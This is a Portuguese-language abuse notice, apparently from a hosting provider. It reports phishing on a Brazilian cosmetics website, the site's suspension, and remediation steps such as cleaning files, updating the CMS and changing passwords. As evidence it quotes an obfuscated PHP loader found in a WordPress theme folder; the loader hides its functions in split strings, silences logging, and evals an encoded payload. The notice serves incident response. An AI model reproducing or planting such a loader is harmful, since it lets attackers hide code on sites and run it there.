Olá
O teor dessa mensagem tem caráter de segurança e deve ser respondido rapidamente. Caso não seja o programador/desenvolvedor ou responsável técnico por seu serviço, recomenda-se que direcione esta mensagem a ele de forma urgente.
Foi identificado Phishing partindo do site
empreendercosmeticos.com.br e para conter esta ação foi necessário desativá-lo temporariamente.
Evidência(s):
---------------------------------------------------
<?php $RTNPr = 'strr'.'Ev'; $fJZUI = 'base6'.'4'.'_d'.'Ec'.'Ode'; $MJDvq = 'gz'.'Uncompress'; error_reporting(0); ini_set('display_errors', 0); ini_set('log_errors', 0); eval($MJDvq($fJZUI($RTNPr('==Q2WA9EN8/hNn/DbBiiFuIuxJ67f3R9WkaJRwX4EO3g+wJtkjNG05v/d/0sAUNN5tCRmA/ZhX9p/xlC4la0nbZ9ZUNzIu3yqK+fOcnmpODx1d1XnZfhn/hZ3D6uMHTPhgcdt6xncQ/NF0Y6TFz4WqDdFzNmbnCHhqKsXydoUBYnQ7MRBQChbKBh6BH+AWMIIokfgkgUBIwABAjsVqU5fV63Q4z6ABfh50a940zuoWuASP/jSdFsnsKbdadsc3JOsx3CCzLy+XzLugy3hOJOi7fapy8kp8hxdx0E2aLs4LioJvLycWXlEMKNUBhWq8w/F3k3KO4/7HH8z6AQxSXx7mBRXbT3HiY6IEIq7Qo94Hmfv6Ddv+Ag3JUsG9lxe/7hhlb9PMrYgg3gmPR47EGk86lbEJWMfdGcWS8NZ8PPphcTpA6zHeNrb8znz9znfW/5D/c69PXW9Tn/71lyvzH14HEjY69lbjnlu38MAhux4ldpklZMYC5L59iNlICfCuMLRwXaVSIhSWj2Hv9q3bBYGGk0Vqge+OFMX/lBdANv2H8v8rTjrXDrZ83trh9Vr6Fv4pNvss1jneY0Dz+WV/aUse2hhtP8yO7qStXWfzn8+vQvuB0Qdvu1BvwADWMZLl8MYf6p7eKrwI/QLLgjkHvvB48j29++ndtdQAP6773G8Sph8QCtQcFepf/v4GeBQrne/VA3Vcou4Vns2hnc+dntDCxONWGW09nt11LtwBn+4gjO7wNBto5MUcyu7s1u3grYOXw2XFI86+sjO6wTPbry46/6MlxgnCz3lqgOp2bdA5jkxHf9rwMO4ORRYLru8fYrAJIX8YhvleDoUMN65JZTqnms4T6SV/8SxKi9QP2HeqPRdT5cZHwg86nf89w994tve++l0fvS/DeUjzyN3+jR0fHboFWXXEdX5o/KoWbpT9GT+RhX+L9sNHFXHWaCGPjuUw23s/685g4saNhIMt6Dd0UpODD3s6+ukTnST/xsOJYiZ3ga3Pwa6UDkhSLsKsEKOaRgoE/mhRKMdcGiS6rqtOvNs6dtzeyiatNIOJowI3FecPY42fOrkveiVYecKOe539xTmNp0uib8eHKHxtWit2uBloeNAEzLDFovSCJhW4Qip3wQ516drzbsLVFQ6yick3LpaB+RyMg2Nt/B8/RQhBO0OZnd3aX7d2x325E0RSyV5LKeIkqbvwC3TZb5OWkitiMs5qKXAeUrK/LHs5LuT7u/3r8Ht21lGr8c+7bs9KX1UiCis/LqS4jYCzwYFnX89htk/DN3P7DzoV70MpB0uFDA3lUiG22XQC4sTEMSUnSEhYOzZ3L24LOM+Co3TjDdF
---------------------------------------------------
Identificados os arquivos/diretórios suspeitos abaixo:
---------------------------------------------------
public_html/wp-content/themes/twentytwentyfive/patterns/
2CSs9uBytJ.php
---------------------------------------------------
Os arquivos citados acima são apenas exemplos localizados numa análise simples e podem conter falsos-positivos.
É Importante o desenvolvedor ficar atento às possíveis brechas de segurança existentes e identificar quais arquivos não pertencem ao funcionamento de seu site ou se foram alterados/comprometidos.
É Sugerido que realize as ações abaixo:
- Identificar e remover scripts maliciosos identificados em sua hospedagem, deixe somente os arquivos necessários para o funcionamento do site após verificação;
- Realizar analise de segurança (varredura com anti-vírus) em todas as maquinas que são utilizadas para acessar os serviços vinculados ao seu domínio, dentro e fora de sua rede, como por exemplo acesso FTP, acesso ao E-mail, autenticação via Painel e etc;
- Reforçar a segurança de autenticação na área administrativa do seu site;
- Caso utilize algum CMS (Wordpress, Joomla, etc), atualize-o, assim como os temas e plugins instalados, a fim de evitar exploração de falhas de segurança no site;
- Altere as senha de acesso ao FTP e banco de dados;
- Sempre utilize senhas fortes;
Teste a força de sua senha:
https://password.kaspersky.com/pt/
Existem ferramentas como o 6scan e Sucuri que ajudam a proteger, detectar e corrigir vulnerabilidades em seu site:
http://6scan.com
http://sitecheck.sucuri.net
Peço que nos informe as respostas das questões abaixo:
1) Qual foi a causa raiz?
2) Quais etapas você tomou para resolver esse problema?
3) Que medidas você tomou para evitar que isso ocorra novamente?
4) A senha de FTP foi alterada ?
Ficamos no aguardo.
Atenciosamente,
Plazo de Entrega: No definido